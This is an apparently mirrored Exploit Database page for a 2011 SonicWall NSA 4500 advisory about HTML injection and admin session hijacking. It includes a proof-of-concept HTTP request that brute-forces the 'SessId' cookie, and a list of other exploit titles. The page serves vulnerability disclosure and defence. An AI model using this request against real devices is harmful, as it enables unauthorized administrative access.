SonicWALL – ‘SessId’ Cookie Brute Force / Admin Session Hijacking

Exploit Database
22 阅读

作者： Hugo Vazquez

日期： 2011-10-04
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/36205/

source: https://www.securityfocus.com/bid/49930/info

SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.

Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.

GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111

last Exploits
SonicWALL – ‘SessId’ Cookie Brute Force / Admin Session Hijacking的更多信息

Huawei EchoLife HG520 – Remote Information Disclosure：
Mailcleaner – (Authenticated) Remote Code Execution (Metasploit)：
rbot 0.9.14 – ‘!react’ Unauthorized Access：
Exim 4.87 < 4.91 - (Local / Remote) Command Execution：
Openbravo ERP – XML External Entity Information Disclosure：
Novell iPrint Client – ActiveX Control target-frame Buffer Overflow (Metasploit)：
Splunk 4.1.6 – ‘segment’ Cross-Site Scripting：
UFO: Alien Invasion 2.2.1 (Windows 7) – Remote Buffer Overflow (ASLR + DEP Bypass)：